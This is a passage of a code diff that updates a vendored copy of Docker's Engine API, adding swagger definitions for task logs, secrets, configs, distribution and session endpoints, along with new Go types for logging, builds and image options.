-              message: "No such container: c2ada9df5af8"
+              message: "No such service: c2ada9df5af8"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
           required: true
-          description: "ID or name of the container"
+          description: "ID or name of the service"
           type: "string"
         - name: "details"
           in: "query"
-          description: "Show extra details provided to logs."
+          description: "Show service context and extra details provided to logs."
           type: "boolean"
           default: false
         - name: "follow"
@@ -7566,55 +9470,357 @@ paths:
                             Gateway: "10.255.0.1"
                     Addresses:
                       - "10.255.0.5/16"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          type: "string"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the tasks list. Available filters:
+
+            - `desired-state=(running | shutdown | accepted)`
+            - `id=<task id>`
+            - `label=key` or `label="key=value"`
+            - `name=<task name>`
+            - `node=<node id or name>`
+            - `service=<service name>`
+      tags: ["Task"]
+  /tasks/{id}:
+    get:
+      summary: "Inspect a task"
+      operationId: "TaskInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Task"
+        404:
+          description: "no such task"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "ID of the task"
+          required: true
+          type: "string"
+      tags: ["Task"]
+  /tasks/{id}/logs:
+    get:
+      summary: "Get task logs"
+      description: |
+        Get `stdout` and `stderr` logs from a task.
+
+        **Note**: This endpoint works only for services with the `json-file` or `journald` logging drivers.
+      operationId: "TaskLogs"
+      produces:
+        - "application/vnd.docker.raw-stream"
+        - "application/json"
+      responses:
+        101:
+          description: "logs returned as a stream"
+          schema:
+            type: "string"
+            format: "binary"
+        200:
+          description: "logs returned as a string in response body"
+          schema:
+            type: "string"
+        404:
+          description: "no such task"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such task: c2ada9df5af8"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          description: "ID of the task"
+          type: "string"
+        - name: "details"
+          in: "query"
+          description: "Show task context and extra details provided to logs."
+          type: "boolean"
+          default: false
+        - name: "follow"
+          in: "query"
+          description: |
+            Return the logs as a stream.
+
+            This will return a `101` HTTP response with a `Connection: upgrade` header, then hijack the HTTP connection to send raw output. For more information about hijacking and the stream format, [see the documentation for the attach endpoint](#operation/ContainerAttach).
+          type: "boolean"
+          default: false
+        - name: "stdout"
+          in: "query"
+          description: "Return logs from `stdout`"
+          type: "boolean"
+          default: false
+        - name: "stderr"
+          in: "query"
+          description: "Return logs from `stderr`"
+          type: "boolean"
+          default: false
+        - name: "since"
+          in: "query"
+          description: "Only return logs since this time, as a UNIX timestamp"
+          type: "integer"
+          default: 0
+        - name: "timestamps"
+          in: "query"
+          description: "Add timestamps to every log line"
+          type: "boolean"
+          default: false
+        - name: "tail"
+          in: "query"
+          description: "Only return this number of log lines from the end of the logs. Specify as an integer or `all` to output all log lines."
+          type: "string"
+          default: "all"
+  /secrets:
+    get:
+      summary: "List secrets"
+      operationId: "SecretList"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Secret"
+            example:
+              - ID: "blt1owaxmitz71s9v5zh81zun"
+                Version:
+                  Index: 85
+                CreatedAt: "2017-07-20T13:55:28.678958722Z"
+                UpdatedAt: "2017-07-20T13:55:28.678958722Z"
+                Spec:
+                  Name: "mysql-passwd"
+                  Labels:
+                    some.label: "some.value"
+                  Driver:
+                    Name: "secret-bucket"
+                    Options:
+                      OptionA: "value for driver option A"
+                      OptionB: "value for driver option B"
+              - ID: "ktnbjxoalbkvbvedmg1urrz8h"
+                Version:
+                  Index: 11
+                CreatedAt: "2016-11-05T01:20:17.327670065Z"
+                UpdatedAt: "2016-11-05T01:20:17.327670065Z"
+                Spec:
+                  Name: "app-dev.crt"
+                  Labels:
+                    foo: "bar"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          type: "string"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the secrets list. Available filters:
+
+            - `id=<secret id>`
+            - `label=<key> or label=<key>=value`
+            - `name=<secret name>`
+            - `names=<secret name>`
+      tags: ["Secret"]
+  /secrets/create:
+    post:
+      summary: "Create a secret"
+      operationId: "SecretCreate"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      responses:
+        201:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/IdResponse"
+        409:
+          description: "name conflicts with an existing object"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "body"
+          in: "body"
+          schema:
+            allOf:
+              - $ref: "#/definitions/SecretSpec"
+              - type: "object"
+                example:
+                  Name: "app-key.crt"
+                  Labels:
+                    foo: "bar"
+                  Data: "VEhJUyBJUyBOT1QgQSBSRUFMIENFUlRJRklDQVRFCg=="
+                  Driver:
+                    Name: "secret-bucket"
+                    Options:
+                      OptionA: "value for driver option A"
+                      OptionB: "value for driver option B"
+      tags: ["Secret"]
+  /secrets/{id}:
+    get:
+      summary: "Inspect a secret"
+      operationId: "SecretInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Secret"
+          examples:
+            application/json:
+              ID: "ktnbjxoalbkvbvedmg1urrz8h"
+              Version:
+                Index: 11
+              CreatedAt: "2016-11-05T01:20:17.327670065Z"
+              UpdatedAt: "2016-11-05T01:20:17.327670065Z"
+              Spec:
+                Name: "app-dev.crt"
+                Labels:
+                  foo: "bar"
+                Driver:
+                  Name: "secret-bucket"
+                  Options:
+                    OptionA: "value for driver option A"
+                    OptionB: "value for driver option B"
 
+        404:
+          description: "secret not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
-        - name: "filters"
-          in: "query"
+        - name: "id"
+          in: "path"
+          required: true
           type: "string"
-          description: |
-            A JSON encoded value of the filters (a `map[string][]string`) to process on the tasks list. Available filters:
-
-            - `id=<task id>`
-            - `name=<task name>`
-            - `service=<service name>`
-            - `node=<node id or name>`
-            - `label=key` or `label="key=value"`
-            - `desired-state=(running | shutdown | accepted)`
-      tags: ["Task"]
-  /tasks/{id}:
-    get:
-      summary: "Inspect a task"
-      operationId: "TaskInspect"
+          description: "ID of the secret"
+      tags: ["Secret"]
+    delete:
+      summary: "Delete a secret"
+      operationId: "SecretDelete"
       produces:
         - "application/json"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "secret not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          type: "string"
+          description: "ID of the secret"
+      tags: ["Secret"]
+  /secrets/{id}/update:
+    post:
+      summary: "Update a Secret"
+      operationId: "SecretUpdate"
       responses:
         200:
           description: "no error"
+        400:
+          description: "bad parameter"
           schema:
-            $ref: "#/definitions/Task"
+            $ref: "#/definitions/ErrorResponse"
         404:
-          description: "no such task"
+          description: "no such secret"
           schema:
             $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
-          description: "ID of the task"
-          required: true
+          description: "The ID or name of the secret"
           type: "string"
-      tags: ["Task"]
-  /secrets:
+          required: true
+        - name: "body"
+          in: "body"
+          schema:
+            $ref: "#/definitions/SecretSpec"
+          description: "The spec of the secret to update. Currently, only the Labels field can be updated. All other fields must remain unchanged from the [SecretInspect endpoint](#operation/SecretInspect) response values."
+        - name: "version"
+          in: "query"
+          description: "The version number of the secret object being updated. This is required to avoid conflicting writes."
+          type: "integer"
+          format: "int64"
+          required: true
+      tags: ["Secret"]
+  /configs:
     get:
-      summary: "List secrets"
-      operationId: "SecretList"
+      summary: "List configs"
+      operationId: "ConfigList"
       produces:
         - "application/json"
       responses:
@@ -7623,7 +9829,7 @@ paths:
           schema:
             type: "array"
             items:
-              $ref: "#/definitions/Secret"
+              $ref: "#/definitions/Config"
             example:
               - ID: "ktnbjxoalbkvbvedmg1urrz8h"
                 Version:
@@ -7631,24 +9837,31 @@ paths:
                 CreatedAt: "2016-11-05T01:20:17.327670065Z"
                 UpdatedAt: "2016-11-05T01:20:17.327670065Z"
                 Spec:
-                  Name: "app-dev.crt"
+                  Name: "server.conf"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "filters"
           in: "query"
           type: "string"
           description: |
-            A JSON encoded value of the filters (a `map[string][]string`) to process on the secrets list. Available filters:
-
-            - `names=<secret name>`
-      tags: ["Secret"]
-  /secrets/create:
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the configs list. Available filters:
+
+            - `id=<config id>`
+            - `label=<key> or label=<key>=value`
+            - `name=<config name>`
+            - `names=<config name>`
+      tags: ["Config"]
+  /configs/create:
     post:
-      summary: "Create a secret"
-      operationId: "SecretCreate"
+      summary: "Create a config"
+      operationId: "ConfigCreate"
       consumes:
         - "application/json"
       produces:
@@ -7657,17 +9870,7 @@ paths:
         201:
           description: "no error"
           schema:
-            type: "object"
-            properties:
-              ID:
-                description: "The ID of the created secret."
-                type: "string"
-            example:
-              ID: "ktnbjxoalbkvbvedmg1urrz8h"
-        406:
-          description: "server error or node is not part of a swarm"
-          schema:
-            $ref: "#/definitions/ErrorResponse"
+            $ref: "#/definitions/IdResponse"
         409:
           description: "name conflicts with an existing object"
           schema:
@@ -7676,31 +9879,36 @@ paths:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "body"
           in: "body"
           schema:
             allOf:
-              - $ref: "#/definitions/SecretSpec"
+              - $ref: "#/definitions/ConfigSpec"
               - type: "object"
                 example:
-                  Name: "app-key.crt"
+                  Name: "server.conf"
                   Labels:
                     foo: "bar"
                   Data: "VEhJUyBJUyBOT1QgQSBSRUFMIENFUlRJRklDQVRFCg=="
-      tags: ["Secret"]
-  /secrets/{id}:
+      tags: ["Config"]
+  /configs/{id}:
     get:
-      summary: "Inspect a secret"
-      operationId: "SecretInspect"
+      summary: "Inspect a config"
+      operationId: "ConfigInspect"
       produces:
         - "application/json"
       responses:
         200:
           description: "no error"
           schema:
-            $ref: "#/definitions/Secret"
-            example:
+            $ref: "#/definitions/Config"
+          examples:
+            application/json:
               ID: "ktnbjxoalbkvbvedmg1urrz8h"
               Version:
                 Index: 11
@@ -7709,77 +9917,220 @@ paths:
               Spec:
                 Name: "app-dev.crt"
         404:
-          description: "secret not found"
-          schema:
-            $ref: "#/definitions/ErrorResponse"
-        406:
-          description: "node is not part of a swarm"
+          description: "config not found"
           schema:
             $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
           required: true
           type: "string"
-          description: "ID of the secret"
-      tags: ["Secret"]
+          description: "ID of the config"
+      tags: ["Config"]
     delete:
-      summary: "Delete a secret"
-      operationId: "SecretDelete"
+      summary: "Delete a config"
+      operationId: "ConfigDelete"
       produces:
         - "application/json"
       responses:
         204:
           description: "no error"
         404:
-          description: "secret not found"
+          description: "config not found"
           schema:
             $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
           required: true
           type: "string"
-          description: "ID of the secret"
-      tags: ["Secret"]
-  /secrets/{id}/update:
+          description: "ID of the config"
+      tags: ["Config"]
+  /configs/{id}/update:
     post:
-      summary: "Update a Secret"
-      operationId: "SecretUpdate"
+      summary: "Update a Config"
+      operationId: "ConfigUpdate"
       responses:
         200:
           description: "no error"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
         404:
-          description: "no such secret"
+          description: "no such config"
           schema:
             $ref: "#/definitions/ErrorResponse"
         500:
           description: "server error"
           schema:
             $ref: "#/definitions/ErrorResponse"
+        503:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
       parameters:
         - name: "id"
           in: "path"
-          description: "The ID of the secret"
+          description: "The ID or name of the config"
           type: "string"
           required: true
         - name: "body"
           in: "body"
           schema:
-            $ref: "#/definitions/SecretSpec"
-          description: "The spec of the secret to update. Currently, only the Labels field can be updated. All other fields must remain unchanged from the [SecretInspect endpoint](#operation/SecretInspect) response values."
+            $ref: "#/definitions/ConfigSpec"
+          description: "The spec of the config to update. Currently, only the Labels field can be updated. All other fields must remain unchanged from the [ConfigInspect endpoint](#operation/ConfigInspect) response values."
         - name: "version"
           in: "query"
-          description: "The version number of the secret object being updated. This is required to avoid conflicting writes."
+          description: "The version number of the config object being updated. This is required to avoid conflicting writes."
           type: "integer"
           format: "int64"
           required: true
-      tags: ["Secret"]
+      tags: ["Config"]
+  /distribution/{name}/json:
+    get:
+      summary: "Get image information from the registry"
+      description: "Return image digest and platform information by contacting the registry."
+      operationId: "DistributionInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "descriptor and platform information"
+          schema:
+            type: "object"
+            x-go-name: DistributionInspect
+            title: "DistributionInspectResponse"
+            required: [Descriptor, Platforms]
+            properties:
+              Descriptor:
+                type: "object"
+                description: "A descriptor struct containing digest, media type, and size"
+                properties:
+                  MediaType:
+                    type: "string"
+                  Size:
+                    type: "integer"
+                    format: "int64"
+                  Digest:
+                    type: "string"
+                  URLs:
+                    type: "array"
+                    items:
+                      type: "string"
+              Platforms:
+                type: "array"
+                description: "An array containing all platforms supported by the image"
+                items:
+                  type: "object"
+                  properties:
+                    Architecture:
+                      type: "string"
+                    OS:
+                      type: "string"
+                    OSVersion:
+                      type: "string"
+                    OSFeatures:
+                      type: "array"
+                      items:
+                        type: "string"
+                    Variant:
+                      type: "string"
+                    Features:
+                      type: "array"
+                      items:
+                        type: "string"
+          examples:
+            application/json:
+              Descriptor:
+                MediaType: "application/vnd.docker.distribution.manifest.v2+json"
+                Digest: "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96"
+                Size: 3987495
+                URLs:
+                  - ""
+              Platforms:
+                - Architecture: "amd64"
+                  OS: "linux"
+                  OSVersion: ""
+                  OSFeatures:
+                    - ""
+                  Variant: ""
+                  Features:
+                    - ""
+        401:
+          description: "Failed authentication or no image found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+          examples:
+            application/json:
+              message: "No such image: someimage (tag: latest)"
+        500:
+          description: "Server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "name"
+          in: "path"
+          description: "Image name or id"
+          type: "string"
+          required: true
+      tags: ["Distribution"]
+  /session:
+    post:
+      summary: "Initialize interactive session"
+      description: |
+        Start a new interactive session with a server. Session allows server to call back to the client for advanced capabilities.
+
+        > **Note**: This endpoint is *experimental* and only available if the daemon is started with experimental
+        > features enabled. The specifications for this endpoint may still change in a future version of the API.
+
+        ### Hijacking
+
+        This endpoint hijacks the HTTP connection to HTTP2 transport that allows the client to expose gPRC services on that connection.
+
+        For example, the client sends this request to upgrade the connection:
+
+        ```
+        POST /session HTTP/1.1
+        Upgrade: h2c
+        Connection: Upgrade
+        ```
+
+        The Docker daemon will respond with a `101 UPGRADED` response follow with the raw stream:
+
+        ```
+        HTTP/1.1 101 UPGRADED
+        Connection: Upgrade
+        Upgrade: h2c
+        ```
+      operationId: "Session"
+      produces:
+        - "application/vnd.docker.raw-stream"
+      responses:
+        101:
+          description: "no error, hijacking successful"
+        400:
+          description: "bad parameter"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      tags: ["Session (experimental)"]
diff --git a/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl
index 3a3d7527da..8bed59d920 100644
--- a/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl
+++ b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl
@@ -4,7 +4,7 @@ package {{ .Package }}
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
 import (
@@ -20,7 +20,7 @@ import (
 
 
 {{ range .ExtraSchemas }}
-// {{ .Name }} {{ template "docstring" . }}
+// {{ .Name }} {{ comment .Description }}
 // swagger:model {{ .Name }}
 {{ template "schema" . }}
 {{ end }}
diff --git a/vendor/github.com/docker/docker/api/types/auth.go b/vendor/github.com/docker/docker/api/types/auth.go
index 056af6b842..ddf15bb182 100644
--- a/vendor/github.com/docker/docker/api/types/auth.go
+++ b/vendor/github.com/docker/docker/api/types/auth.go
@@ -1,4 +1,4 @@
-package types
+package types // import "github.com/docker/docker/api/types"
 
 // AuthConfig contains authorization information for connecting to a Registry
 type AuthConfig struct {
diff --git a/vendor/github.com/docker/docker/api/types/backend/backend.go b/vendor/github.com/docker/docker/api/types/backend/backend.go
index abc0bba3fe..ef1e669c39 100644
--- a/vendor/github.com/docker/docker/api/types/backend/backend.go
+++ b/vendor/github.com/docker/docker/api/types/backend/backend.go
@@ -1,11 +1,11 @@
 // Package backend includes types to send information to server backends.
-package backend
+package backend // import "github.com/docker/docker/api/types/backend"
 
 import (
 	"io"
+	"time"
 
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/api/types/container"
 )
 
 // ContainerAttachConfig holds the streams to use when connecting to a container to view logs.
@@ -18,18 +18,55 @@ type ContainerAttachConfig struct {
 	Stream     bool
 	DetachKeys string
 
-	// Used to signify that streams are multiplexed and therefore need a StdWriter to encode stdout/sderr messages accordingly.
+	// Used to signify that streams are multiplexed and therefore need a StdWriter to encode stdout/stderr messages accordingly.
 	// TODO @cpuguy83: This shouldn't be needed. It was only added so that http and websocket endpoints can use the same function, and the websocket function was not using a stdwriter prior to this change...
 	// HOWEVER, the websocket endpoint is using a single stream and SHOULD be encoded with stdout/stderr as is done for HTTP since it is still just a single stream.
 	// Since such a change is an API change unrelated to the current changeset we'll keep it as is here and change separately.
 	MuxStreams bool
 }
 
-// ContainerLogsConfig holds configs for logging operations. Exists
-// for users of the backend to to pass it a logging configuration.
-type ContainerLogsConfig struct {
-	types.ContainerLogsOptions
-	OutStream io.Writer
+// PartialLogMetaData provides meta data for a partial log message. Messages
+// exceeding a predefined size are split into chunks with this metadata. The
+// expectation is for the logger endpoints to assemble the chunks using this
+// metadata.
+type PartialLogMetaData struct {
+	Last    bool   //true if this message is last of a partial
+	ID      string // identifies group of messages comprising a single record
+	Ordinal int    // ordering of message in partial group
+}
+
+// LogMessage is datastructure that represents piece of output produced by some
+// container.  The Line member is a slice of an array whose contents can be
+// changed after a log driver's Log() method returns.
+// changes to this struct need to be reflect in the reset method in
+// daemon/logger/logger.go
+type LogMessage struct {
+	Line         []byte
+	Source       string
+	Timestamp    time.Time
+	Attrs        []LogAttr
+	PLogMetaData *PartialLogMetaData
+
+	// Err is an error associated with a message. Completeness of a message
+	// with Err is not expected, tho it may be partially complete (fields may
+	// be missing, gibberish, or nil)
+	Err error
+}
+
+// LogAttr is used to hold the extra attributes available in the log message.
+type LogAttr struct {
+	Key   string
+	Value string
+}
+
+// LogSelector is a list of services and tasks that should be returned as part
+// of a log stream. It is similar to swarmapi.LogSelector, with the difference
+// that the names don't have to be resolved to IDs; this is mostly to avoid
+// accidents later where a swarmapi LogSelector might have been incorrectly
+// used verbatim (and to avoid the handler having to import swarmapi types)
+type LogSelector struct {
+	Services []string
+	Tasks    []string
 }
 
 // ContainerStatsConfig holds information for configuring the runtime
@@ -66,19 +103,26 @@ type ExecProcessConfig struct {
 	User       string   `json:"user,omitempty"`
 }
 
-// ContainerCommitConfig is a wrapper around
-// types.ContainerCommitConfig that also
-// transports configuration changes for a container.
-type ContainerCommitConfig struct {
-	types.ContainerCommitConfig
+// CreateImageConfig is the configuration for creating an image from a
+// container.
+type CreateImageConfig struct {
+	Repo    string
+	Tag     string
+	Pause   bool
+	Author  string
+	Comment string
+	Config  *container.Config
 	Changes []string
 }
 
-// ProgressWriter is an interface
-// to transport progress streams.
-type ProgressWriter struct {
-	Output             io.Writer
-	StdoutFormatter    *streamformatter.StdoutFormatter
-	StderrFormatter    *streamformatter.StderrFormatter
-	ProgressReaderFunc func(io.ReadCloser) io.ReadCloser
+// CommitConfig is the configuration for creating an image as part of a build.
+type CommitConfig struct {
+	Author              string
+	Comment             string
+	Config              *container.Config
+	ContainerConfig     *container.Config
+	ContainerID         string
+	ContainerMountLabel string
+	ContainerOS         string
+	ParentImageID       string
 }
diff --git a/vendor/github.com/docker/docker/api/types/backend/build.go b/vendor/github.com/docker/docker/api/types/backend/build.go
new file mode 100644
index 0000000000..31e00ec6ce
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/backend/build.go
@@ -0,0 +1,44 @@
+package backend // import "github.com/docker/docker/api/types/backend"
+
+import (
+	"io"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/streamformatter"
+)
+
+// PullOption defines different modes for accessing images
+type PullOption int
+
+const (
+	// PullOptionNoPull only returns local images
+	PullOptionNoPull PullOption = iota
+	// PullOptionForcePull always tries to pull a ref from the registry first
+	PullOptionForcePull
+	// PullOptionPreferLocal uses local image if it exists, otherwise pulls
+	PullOptionPreferLocal
+)
+
+// ProgressWriter is a data object to transport progress streams to the client
+type ProgressWriter struct {
+	Output             io.Writer
+	StdoutFormatter    io.Writer
+	StderrFormatter    io.Writer
+	AuxFormatter       *streamformatter.AuxFormatter
+	ProgressReaderFunc func(io.ReadCloser) io.ReadCloser
+}
+
+// BuildConfig is the configuration used by a BuildManager to start a build
+type BuildConfig struct {
+	Source         io.ReadCloser
+	ProgressWriter ProgressWriter
+	Options        *types.ImageBuildOptions
+}
+
+// GetImageAndLayerOptions are the options supported by GetImageAndReleasableLayer
+type GetImageAndLayerOptions struct {
+	PullOption PullOption
+	AuthConfig map[string]types.AuthConfig
+	Output     io.Writer
+	OS         string
+}
diff --git a/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go
index 931ae10ab1..bf3463b90e 100644
--- a/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go
+++ b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go
@@ -1,4 +1,4 @@
-package blkiodev
+package blkiodev // import "github.com/docker/docker/api/types/blkiodev"
 
 import "fmt"
 
diff --git a/vendor/github.com/docker/docker/api/types/client.go b/vendor/github.com/docker/docker/api/types/client.go
index 7900d64f0d..3df8d23368 100644
--- a/vendor/github.com/docker/docker/api/types/client.go
+++ b/vendor/github.com/docker/docker/api/types/client.go
@@ -1,10 +1,9 @@
-package types
+package types // import "github.com/docker/docker/api/types"
 
 import (
 	"bufio"
 	"io"
 	"net"
-	"os"
 
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/filters"
@@ -75,6 +74,7 @@ type ContainerLogsOptions struct {
 	ShowStdout bool
 	ShowStderr bool
 	Since      string
+	Until      string
 	Timestamps bool
 	Follow     bool
 	Tail       string
@@ -98,6 +98,7 @@ type ContainerStartOptions struct {
 // about files to copy into a container
 type CopyToContainerOptions struct {
 	AllowOverwriteDirWithFile bool
+	CopyUIDGID                bool
 }
 
 // EventsOptions holds parameters to filter events with.
@@ -160,9 +161,10 @@ type ImageBuildOptions struct {
 	ShmSize        int64
 	Dockerfile     string
 	Ulimits        []*units.Ulimit
-	// See the parsing of buildArgs in api/server/router/build/build_routes.go
-	// for an explaination of why BuildArgs needs to use *string instead of
-	// just a string
+	// BuildArgs needs to be a *string instead of just a string so that
+	// we can tell the difference between "" (empty string) and no value
+	// at all (nil). See the parsing of buildArgs in
+	// api/server/router/build/build_routes.go for even more info.
 	BuildArgs   map[string]*string
 	AuthConfigs map[string]AuthConfig
 	Context     io.Reader
@@ -175,8 +177,28 @@ type ImageBuildOptions struct {
 	// specified here do not need to have a valid parent chain to match cache.
 	CacheFrom   []string
 	SecurityOpt []string
+	ExtraHosts  []string // List of extra hosts
+	Target      string
+	SessionID   string
+	Platform    string
+	// Version specifies the version of the unerlying builder to use
+	Version BuilderVersion
+	// BuildID is an optional identifier that can be passed together with the
+	// build request. The same identifier can be used to gracefully cancel the
+	// build with the cancel request.
+	BuildID string
 }
 
+// BuilderVersion sets the version of underlying builder to use
+type BuilderVersion string
+
+const (
+	// BuilderV1 is the first generation builder in docker daemon
+	BuilderV1 BuilderVersion = "1"
+	// BuilderBuildKit is builder based on moby/buildkit project
+	BuilderBuildKit = "2"
+)
+
 // ImageBuildResponse holds information
 // returned by a server after building
 // an image.
@@ -187,20 +209,22 @@ type ImageBuildResponse struct {
 
 // ImageCreateOptions holds information to create images.
 type ImageCreateOptions struct {
-	RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry
+	RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry.
+	Platform     string // Platform is the target platform of the image if it needs to be pulled from the registry.
 }
 
 // ImageImportSource holds source information for ImageImport
 type ImageImportSource struct {
-	Source     io.Reader // Source is the data to send to the server to create this image from (mutually exclusive with SourceName)
-	SourceName string    // SourceName is the name of the image to pull (mutually exclusive with Source)
+	Source     io.Reader // Source is the data to send to the server to create this image from. You must set SourceName to "-" to leverage this.
+	SourceName string    // SourceName is the name of the image to pull. Set to "-" to leverage the Source attribute.
 }
 
 // ImageImportOptions holds information to import images from the client host.
 type ImageImportOptions struct {
-	Tag     string   // Tag is the name to tag this image with. This attribute is deprecated.
-	Message string   // Message is the message to tag the image with
-	Changes []string // Changes are the raw changes to apply to this image
+	Tag      string   // Tag is the name to tag this image with. This attribute is deprecated.
+	Message  string   // Message is the message to tag the image with
+	Changes  []string // Changes are the raw changes to apply to this image
+	Platform string   // Platform is the target platform of the image
 }
 
 // ImageListOptions holds parameters to filter the list of images with.
@@ -221,6 +245,7 @@ type ImagePullOptions struct {
 	All           bool
 	RegistryAuth  string // RegistryAuth is the base64 encoded credentials for the registry
 	PrivilegeFunc RequestPrivilegeFunc
+	Platform      string
 }
 
 // RequestPrivilegeFunc is a function interface that
@@ -256,18 +281,6 @@ type ResizeOptions struct {
 	Width  uint
 }
 
-// VersionResponse holds version information for the client and the server
-type VersionResponse struct {
-	Client *Version
-	Server *Version
-}
-
-// ServerOK returns true when the client could connect to the docker server
-// and parse the information received. It returns false otherwise.
-func (v VersionResponse) ServerOK() bool {
-	return v.Server != nil
-}
-
 // NodeListOptions holds parameters to list nodes with.
 type NodeListOptions struct {
 	Filters filters.Args
@@ -285,6 +298,12 @@ type ServiceCreateOptions struct {
 	//
 	// This field follows the format of the X-Registry-Auth header.
 	EncodedRegistryAuth string
+
+	// QueryRegistry indicates whether the service update requires
+	// contacting a registry. A registry may be contacted to retrieve
+	// the image digest and manifest, which in turn can be used to update
+	// platform or other information about the service.
+	QueryRegistry bool
 }
 
 // ServiceCreateResponse contains the information returned to a client
@@ -318,14 +337,32 @@ type ServiceUpdateOptions struct {
 	// credentials if they are not given in EncodedRegistryAuth. Valid
 	// values are "spec" and "previous-spec".
 	RegistryAuthFrom string
+
+	// Rollback indicates whether a server-side rollback should be
+	// performed. When this is set, the provided spec will be ignored.
+	// The valid values are "previous" and "none". An empty value is the
+	// same as "none".
+	Rollback string
+
+	// QueryRegistry indicates whether the service update requires
+	// contacting a registry. A registry may be contacted to retrieve
+	// the image digest and manifest, which in turn can be used to update
+	// platform or other information about the service.
+	QueryRegistry bool
 }
 
-// ServiceListOptions holds parameters to list  services with.
+// ServiceListOptions holds parameters to list services with.
 type ServiceListOptions struct {
 	Filters filters.Args
 }
 
-// TaskListOptions holds parameters to list  tasks with.
+// ServiceInspectOptions holds parameters related to the "service inspect"
+// operation.
+type ServiceInspectOptions struct {
+	InsertDefaults bool
+}
+
